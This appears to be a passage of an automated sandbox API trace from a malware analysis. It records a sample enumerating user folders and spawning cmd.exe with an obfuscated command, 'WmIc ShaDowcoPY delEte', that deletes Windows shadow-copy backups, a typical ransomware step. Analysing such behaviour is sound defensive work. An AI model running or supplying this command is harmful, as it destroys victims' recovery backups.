ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x360034, dwReserved1=0x295e9f0, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 0 [0154.675] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0154.675] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0154.675] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0154.675] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Videos", cAlternateFileName="")) returned 0 [0154.675] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0154.675] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xdd354335, cFileName="Public", cAlternateFileName="")) returned 0 [0154.675] FindClose (in: hFindFile=0x5446d0 | out: hFindFile=0x5446d0) returned 1 [0154.675] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0154.676] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0154.676] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0154.676] lstrcmpiW (lpString1="Windows", lpString2="...") returned 1 [0154.676] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0154.676] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0154.676] FindClose (in: hFindFile=0x5445d0 | out: hFindFile=0x5445d0) returned 1 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x72efe000" os_pid = "0x440" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WmIc ShaDowcoPY delEte" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 5 os_tid = 0xc4 [0082.478] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x34fba4 | out: lpSystemTimeAsFileTime=0x34fba4*(dwLowDateTime=0xc946a590, dwHighDateTime=0x1d62251)) [0082.478] GetCurrentProcessId () returned 0x440 [0082.478] GetCurrentThreadId () returned 0xc4 [0082.478] GetTickCount () returned 0x1149dc6 [0082.479] QueryPerformanceCounter (in: lpPerformanceCount=0x34fb9c | out: lpPerformanceCount=0x34fb9c*=20280353287) returned 1 [0082.480] GetModuleHandleA (lpModuleName=0x0) returned 0x4aa70000 [0082.480] __set_app_type (_Type=0x1) [0082.480] __p__fmode () returned 0x770331f4 [0082.529] __p__commode () returned 0x770331fc [0082.529] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4aa921a6) returned 0x0 [0082.529] __getmainargs (in: _Argc=0x4aa94238, _Argv=0x4aa94240, _Env=0x4aa9423c, _DoWildCard=0, _StartInfo=0x4aa94140 | out: _Argc=0x4aa94238, _Argv=0x4aa94240, _Env=0x4aa9423c) returned 0 [0082.529] GetCurrentThreadId () returned 0xc4 [0082.529] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc4) returned 0x60 [0082.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0082.530] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0082.530] SetThreadUILanguage (LangId=0x0) returned 0x409 [0082.530] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0082.530] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x34fb34 | out: phkResult=0x34fb34*=0x0) returned 0x2 [0082.531] VirtualQuery (in: lpAddress=0x34fb6b, lpBuffer=0x34fb04, dwLength=0x1c | out: lpBuffer=0x34fb04*(BaseAddress=0x34f000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0082.531] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x34fb04, dwLength=0x1c | out: lpBuffer=0x34fb04*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0082.531] VirtualQuery (in: lpAddress=0x251000, lpBuffer=0x34fb04, dwLength=0x1c | out: lpBuffer=0x34fb04*(BaseAddress=0x251000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0082.531] VirtualQuery (in: lpAddress=0x253000, lpBuffer=0x34fb04, dwLength=0x1c | out: lpBuffer=0x34fb04*(BaseAddress=0x253000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0082.531] VirtualQuery (in: lpAddress=0x350000, lpBuffer=0x34fb04, dwLength=0x1c | out: lpBuffer=0x34fb04*(BaseAddress=0x350000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0082.531] GetConsoleOutputCP () returned 0x1b5 [0082.531] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa94260 | out: lpCPInfo=0x4aa94260) returned 1 [0082.531] SetConsoleCtrlHandler (HandlerRoutine=0x4aa8e72a, Add=1) returned 1 [0082.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0082.531] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0082.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0082.532] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa941ac | out: lpMode=0x4aa941ac) returned 1 [0082.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0082.532] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0082.532] _get_osfhandle (_FileHandle=0) returned 0x3 [0082.532] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa941b0 | out: lpMode=0x4aa941b0) returned 1 [0082.599] _get_osfhandle (_FileHandle=0) returned 0x3 [0082.600] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0082.600] GetEnvironmentStringsW () returned 0x3c2038* [0082.600] GetProcessHeap () returned 0x3b0000 [0082.600] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xaca) returned 0x3c2b10 [0082.600] FreeEnvironmentStringsW (penv=0x3c2038) returned 1 [0082.600] GetProcessHeap () returned 0x3b0000 [0082.600] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4) returned 0x3c0c70 [0082.600] GetEnvironmentStringsW () returned 0x3c2038* [0082.601] GetProcessHeap () returned 0x3b0000 [0082.601] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xaca) returned 0x3c35e8 [0082.601] FreeEnvironmentStringsW (penv=0x3c2038) returned 1 [0082.601] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34eaa4 | out: phkResult=0x34eaa4*=0x68) returned 0x0 [0082.601] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x0, lpData=0x34eab0*=0x0, lpcbData=0x34eaa8*=0x1000) returned 0x2 [0082.601] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x4, lpData=0x34eab0*=0x1, lpcbData=0x34eaa8*=0x4) returned 0x0 [0082.601] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x0, lpData=0x34eab0*=0x1, lpcbData=0x34eaa8*=0x1000) returned 0x2 [0082.601] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x4, lpData=0x34eab0*=0x0, lpcbData=0x34eaa8*=0x4) returned 0x0 [0082.601] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x4, lpData=0x34eab0*=0x40, lpcbData=0x34eaa8*=0x4) returned 0x0 [0082.601] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x4, lpData=0x34eab0*=0x40, lpcbData=0x34eaa8*=0x4) returned 0x0 [0082.601] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x0, lpData=0x34eab0*=0x40, lpcbData=0x34eaa8*=0x1000) returned 0x2 [0082.602] RegCloseKey (hKey=0x68) returned 0x0 [0082.602] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34eaa4 | out: phkResult=0x34eaa4*=0x68) returned 0x0 [0082.602] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x0, lpData=0x34eab0*=0x40, lpcbData=0x34eaa8*=0x1000) returned 0x2 [0082.602] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x4, lpData=0x34eab0*=0x1, lpcbData=0x34eaa8*=0x4) returned 0x0 [0082.602] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x0, lpData=0x34eab0*=0x1, lpcbData=0x34eaa8*=0x1000) returned 0x2 [0082.602] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x4, lpData=0x34eab0*=0x0, lpcbData=0x34eaa8*=0x4) returned 0x0 [0082.602] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x4, lpData=0x34eab0*=0x9, lpcbData=0x34eaa8*=0x4) returned 0x0 [0082.602] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x4, lpData=0x34eab0*=0x9, lpcbData=0x34eaa8*=0x4) returned 0x0 [0082.602] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34eaac, lpData=0x34eab0, lpcbData=0x34eaa8*=0x1000 | out: lpType=0x34eaac*=0x0, lpData=0x34eab0*=0x9, lpcbData=0x34eaa8*=0x1000) returned 0x2 [0082.602] RegCloseKey (hKey=0x68) returned 0x0 [0082.602] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb0799b [0082.602] srand (_Seed=0x5eb0799b) [0082.602] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WmIc ShaDowcoPY delEte" [0082.602] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WmIc ShaDowcoPY delEte" [0082.614] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa95260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0082.614] GetProcessHeap () returned 0x3b0000 [0082.614] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x210) returned 0x3c2038 [0082.614] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c2040, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0082.623] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aaa0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0082.623] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aaa0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0082.623] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4aaa0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0082.623] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0082.623] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0082.623] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0082.623] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0082.623] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0082.623] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0082.623] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0082.623] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0082.623] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0082.623] GetProcessHeap () returned 0x3b0000 [0082.623] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c2b10 | out: hHeap=0x3b0000) returned 1 [0082.623] GetEnvironmentStringsW () returned 0x3c2250* [0082.624] GetProcessHeap () returned 0x3b0000 [0082.624] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xae2) returned 0x3c4bb0 [0082.624] FreeEnvironmentStringsW (penv=0x3c2250) returned 1 [0082.624] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4aaa0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0082.624] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4aaa0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0082.624] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0082.624] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0082.624] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0082.624] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0082.624] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0082.624] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0082.624] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0082.624] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0082.624] GetProcessHeap () returned 0x3b0000 [0082.624] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x54) returned 0x3c56a0 [0082.624] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x34f870 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0082.625] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x34f870, lpFilePart=0x34f86c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f86c*="Desktop") returned 0x25 [0082.625] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0082.625] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x34f5ec | out: lpFindFileData=0x34f5ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3c1eb8 [0082.625] FindClose (in: hFindFile=0x3c1eb8 | out: hFindFile=0x3c1eb8) returned 1 [0082.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x34f5ec | out: lpFindFileData=0x34f5ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3c1eb8 [0082.625] FindClose (in: hFindFile=0x3c1eb8 | out: hFindFile=0x3c1eb8) returned 1 [0082.626] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0082.626] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x34f5ec | out: lpFindFileData=0x34f5ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb9ebb540, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xb9ebb540, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3c1eb8 [0082.626] FindClose (in: hFindFile=0x3c1eb8 | out: hFindFile=0x3c1eb8) returned 1 [0082.626] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0082.626] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0082.626] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0082.626] GetProcessHeap () returned 0x3b0000 [0082.626] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c4bb0 | out: hHeap=0x3b0000) returned 1 [0082.626] GetEnvironmentStringsW () returned 0x3c40c0* [0082.626] GetProcessHeap () returned 0x3b0000 [0082.626] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb36) returned 0x3c5f00 [0082.627] FreeEnvironmentStringsW (penv=0x3c40c0) returned 1 [0082.627] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa95260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0082.627] GetProcessHeap () returned 0x3b0000 [0082.627] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c56a0 | out: hHeap=0x3b0000) returned 1 [0082.627] GetProcessHeap () returned 0x3b0000 [0082.627] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x400e) returned 0x3c6a40 [0082.627] GetProcessHeap () returned 0x3b0000 [0082.627] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x3a) returned 0x3c1eb8 [0082.627] GetProcessHeap () returned 0x3b0000 [0082.627] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c6a40 | out: hHeap=0x3b0000) returned 1 [0082.627] GetConsoleOutputCP () returned 0x1b5 [0082.628] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa94260 | out: lpCPInfo=0x4aa94260) returned 1 [0082.628] GetUserDefaultLCID () returned 0x409 [0082.628] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4aa94950, cchData=8 | out: lpLCData=":") returned 2 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x34f9b0, cchData=128 | out: lpLCData="0") returned 2 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x34f9b0, cchData=128 | out: lpLCData="0") returned 2 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x34f9b0, cchData=128 | out: lpLCData="1") returned 2 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4aa94940, cchData=8 | out: lpLCData="/") returned 2 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4aa94d80, cchData=32 | out: lpLCData="Mon") returned 4 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4aa94d40, cchData=32 | out: lpLCData="Tue") returned 4 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4aa94d00, cchData=32 | out: lpLCData="Wed") returned 4 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4aa94cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4aa94c80, cchData=32 | out: lpLCData="Fri") returned 4 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4aa94c40, cchData=32 | out: lpLCData="Sat") returned 4 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4aa94c00, cchData=32 | out: lpLCData="Sun") returned 4 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4aa94930, cchData=8 | out: lpLCData=".") returned 2 [0082.629] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4aa94920, cchData=8 | out: lpLCData=",") returned 2 [0082.630] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0082.631] GetProcessHeap () returned 0x3b0000 [0082.631] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x20c) returned 0x3c2dc8 [0082.631] GetConsoleTitleW (in: lpConsoleTitle=0x3c2dc8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0082.631] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0082.631] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0082.631] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0082.632] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0082.633] GetProcessHeap () returned 0x3b0000 [0082.633] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x400a) returned 0x3c6a40 [0082.633] GetProcessHeap () returned 0x3b0000 [0082.633] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c6a40 | out: hHeap=0x3b0000) returned 1 [0082.633] _wcsicmp (_String1="WmIc", _String2=")") returned 78 [0082.633] _wcsicmp (_String1="FOR", _String2="WmIc") returned -17 [0082.633] _wcsicmp (_String1="FOR/?", _String2="WmIc") returned -17 [0082.633] _wcsicmp (_String1="IF", _String2="WmIc") returned -14 [0082.633] _wcsicmp (_String1="IF/?", _String2="WmIc") returned -14 [0082.633] _wcsicmp (_String1="REM", _String2="WmIc") returned -5 [0082.633] _wcsicmp (_String1="REM/?", _String2="WmIc") returned -5 [0082.634] GetProcessHeap () returned 0x3b0000 [0082.634] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x58) returned 0x3c2fe0 [0082.634] GetProcessHeap () returned 0x3b0000 [0082.634] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x12) returned 0x3c3040 [0082.634] GetProcessHeap () returned 0x3b0000 [0082.634] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x2e) returned 0x3c3060 [0082.635] GetConsoleTitleW (in: lpConsoleTitle=0x34f6a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0082.636] _wcsicmp (_String1="WmIc", _String2="DIR") returned 19 [0082.636] _wcsicmp (_String1="WmIc", _String2="ERASE") returned 18 [0082.636] _wcsicmp (_String1="WmIc", _String2="DEL") returned 19 [0082.636] _wcsicmp (_String1="WmIc", _String2="TYPE") returned 3 [0082.636] _wcsicmp (_String1="WmIc", _String2="COPY") returned 20 [0082.636] _wcsicmp (_String1="WmIc", _String2="CD") returned 20 [0082.636] _wcsicmp (_String1="WmIc", _String2="CHDIR") returned 20 [0082.636] _wcsicmp (_String1="WmIc", _String2="RENAME") returned 5 [0082.636] _wcsicmp (_String1="WmIc", _String2="REN") returned 5 [0082.636] _wcsicmp (_String1="WmIc", _String2="ECHO") returned 18 [0082.636] _wcsicmp (_String1="WmIc", _String2="SET") returned 4 [0082.636] _wcsicmp (_String1="WmIc", _String2="PAUSE") returned 7 [0082.636] _wcsicmp (_String1="WmIc", 